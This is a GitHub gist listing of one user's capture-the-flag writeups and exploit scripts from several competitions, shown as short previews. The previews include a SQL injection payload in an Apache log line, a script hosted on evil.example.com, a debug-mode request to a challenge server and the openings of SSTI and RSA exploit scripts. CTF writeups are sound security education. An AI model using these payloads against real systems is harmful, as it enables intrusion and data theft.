Takeshi Kaneko arkark

arkark / darkctf.md
Last active September 27, 2020 16:49
DarkCTF writeup

DarkCTF writeups

https://ctftime.org/event/1118

Web/Apache Logs (431 solves / 113 points)

The following log entry is suspicious: its payload is long and contains union+all+select.

192.168.32.1 - - [29/Sep/2015:03:39:46 -0400] "GET /mutillidae/index.php?page=client-side-control-challenge.php HTTP/1.1" 200 9197 "http://192.168.32.134/mutillidae/index.php?page=user-info.php&username=%27+union+all+select+1%2CString.fromCharCode%28102%2C%2B108%2C%2B97%2C%2B103%2C%2B32%2C%2B105%2C%2B115%2C%2B32%2C%2B68%2C%2B97%2C%2B114%2C%2B107%2C%2B67%2C%2B84%2C%2B70%2C%2B123%2C%2B53%2C%2B113%2C%2B108%2C%2B95%2C%2B49%2C%2B110%2C%2B106%2C%2B51%2C%2B99%2C%2B116%2C%2B49%2C%2B48%2C%2B110%2C%2B125%29%2C3+--%2B&password=&user-info-php-submit-button=View+Account+Details" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
arkark / omh-ctf-2021.md
Last active May 16, 2021 12:06
OMH CTF 2021 writeups

Polite Notepad

I hosted the following file on my server at http://evil.example.com/static/badwords.js:

var bad1 = 'fuck'
var good1 = 'f**k'
arkark / alles-ctf-2021.md
Last active September 5, 2021 04:51
ALLES! CTF 2021

[web] J(ust)-S(erving)-P(ages)

$ echo '{"debugMode": true}' | http --session=./session.json POST "https://7b000000f4b98db0221891c1-just-serving-pages.challenge.master.allesctf.net:31337/config"
HTTP/1.1 200
Content-Length: 2900
Content-Type: text/html;charset=utf-8
Date: Sat, 04 Sep 2021 11:26:02 GMT
arkark / exploit.sage
Created June 5, 2022 06:50
SECCON Beginners CTF 2022 - crypto/omni-RSA
# SECCON Beginners CTF 2022
# crypto/omni-RSA
from Crypto.Util.number import isPrime, long_to_bytes
import gmpy2
rq = 7062868051777431792068714233088346458853439302461253671126410604645566438638
e = 2003
n = 140735937315721299582012271948983606040515856203095488910447576031270423278798287969947290908107499639255710908946669335985101959587493331281108201956459032271521083896344745259700651329459617119839995200673938478129274453144336015573208490094867570399501781784015670585043084941769317893797657324242253119873
s = 1227151974351032983332456714998776453509045403806082930374928568863822330849014696701894272422348965090027592677317646472514367175350102138331
arkark / exploit.py
Last active June 14, 2022 06:24
WeCTF 2022 / Request Bin (Extra Hard)
# WeCTF 2022 ( https://github.com/wectf/2022 )
# Request Bin (Extra Hard)
# 4 solves / 2526 pts
# SSTI for Go's text/template with Iris web framework
# - Iris: https://github.com/kataras/iris
# - text/template: https://pkg.go.dev/text/template
# The goal is getting the random file name (`/$(uuidgen)-$(uuidgen)`) and printing the flag.
arkark / README.md
Created July 4, 2022 12:23
Google Capture The Flag 2022 / HORKOS & LOG4J2
arkark / README.md
Created July 25, 2022 12:55
DiceCTF @ HOPE / your-space (web) / bonk (misc)
arkark / exploit.fish
Last active September 4, 2022 05:29
CakeCTF 2022 / Panda Memo
# CakeCTF 2022 ( https://ctftime.org/event/1683 )
# web / Panda Memo
set BASE_URL "http://localhost:3000"
set BASIC_USER guest
set BASIC_PASS guest
# set BASE_URL "http://web2.2022.cakectf.com:40767"
# set BASIC_USER guest
# set BASIC_PASS L4VBqmWQZP6S2P8.
arkark / solve.py
Created October 2, 2022 16:45
SekaiCTF 2022 / PPC / Electric Box
RN = input()
rs = input()[:20]
LWM = input()
H, W, M = list(map(int, LWM.split(" ")))
obs = ""
for i in range(M):
obs += input() + "_"
obs = obs[:20]
arkark / hook.js
Created March 12, 2023 16:37
hxp CTF 2022 - rev/required
/*
hxp CTF 2022 - rev/required
* https://ctftime.org/event/1845
My solution with JavaScript's Proxy:
1. Save this file as `hook.js`
2. Change the first line of `required.js` to: